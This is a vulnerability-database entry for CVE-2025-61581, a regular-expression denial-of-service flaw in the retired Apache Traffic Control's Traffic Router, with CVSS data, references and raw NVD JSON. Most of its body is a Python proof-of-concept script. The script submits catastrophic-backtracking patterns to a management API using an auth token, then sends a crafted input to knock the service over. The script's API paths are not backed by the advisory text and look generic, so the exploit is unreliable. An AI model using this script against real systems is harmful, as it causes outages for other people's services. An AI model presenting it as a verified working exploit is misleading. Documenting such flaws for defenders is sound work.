CVE-2025-61581

Description

** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control. This issue affects Apache Traffic Control: all versions. People with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:traffic_control:*:*:*:*:*:*:*:* - VULNERABLE

Apache Traffic Control 所有版本（项目已退役）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61581 PoC - Apache Traffic Control ReDoS Attack
# This PoC demonstrates the ReDoS vulnerability in Traffic Router's regex handling

import requests
import re
import time

# Target Traffic Router management interface
TARGET_URL = "http://target-traffic-router:8080"
AUTH_TOKEN = "your_auth_token"  # Required: access to management interface

# Malicious regex patterns that cause catastrophic backtracking
MALICIOUS_PATTERNS = [
    # Pattern 1: Nested quantifiers (a+)+
    r"^(a+)+$",
    # Pattern 2: Alternation with overlap (a|a)*
    r"^(a|a)*$",
    # Pattern 3: Complex nested groups
    r"^((a+)+)+$",
    # Pattern 4: Greedy quantifier with alternation
    r"^(a|aa)+$",
]

# Input string designed to trigger maximum backtracking
EVIL_INPUT = "a" * 50 + "!"  # Long string of 'a' followed by non-matching char

def submit_malicious_regex(pattern):
    """Submit a malicious regex pattern to Traffic Router management API"""
    endpoint = f"{TARGET_URL}/api/1.2/patterns"
    headers = {
        "Authorization": f"Bearer {AUTH_TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "pattern": pattern,
        "type": "REGEX",
        "description": "malicious_pattern"
    }
    response = requests.post(endpoint, json=payload, headers=headers)
    return response.status_code == 200

def trigger_regex_evaluation(pattern_id):
    """Trigger regex evaluation by sending matching request"""
    # Send request that will be evaluated against the malicious pattern
    test_url = f"{TARGET_URL}/patterns/test"
    params = {
        "pattern_id": pattern_id,
        "request_uri": EVIL_INPUT
    }
    start = time.time()
    try:
        response = requests.get(test_url, params=params, timeout=300)
        elapsed = time.time() - start
        print(f"Request completed in {elapsed:.2f}s")
    except requests.exceptions.Timeout:
        elapsed = time.time() - start
        print(f"Request timed out after {elapsed:.2f}s - DoS confirmed!")

if __name__ == "__main__":
    # Step 1: Submit malicious regex pattern
    for pattern in MALICIOUS_PATTERNS:
        print(f"Submitting pattern: {pattern}")
        if submit_malicious_regex(pattern):
            print("Pattern submitted successfully")
            # Step 2: Trigger evaluation with evil input
            trigger_regex_evaluation(pattern_id="latest")
            break

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61581
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61581
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61581/
[4] VulDB https://vuldb.com/cve/CVE-2025-61581
[5] https://lists.apache.org/thread/mx2jxgnlop2f4vbqnvmrldh4pqmobxvp
[6] http://www.openwall.com/lists/oss-security/2025/10/16/3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61581", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:35.670", "lastModified": "2025-11-04T22:16:36.130", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control.\n\nThis issue affects Apache Traffic Control: all versions.\n\nPeople with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability.\n\nAs this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.\n\nNOTE: This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:traffic_control:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.0.2", "matchCriteriaId": "88B9FDA7-BEEC-4CD1-B17C-DBBFBB96B674"}]}]}], "references": [{"url": "https://lists.apache.org/thread/mx2jxgnlop2f4vbqnvmrldh4pqmobxvp", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/16/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}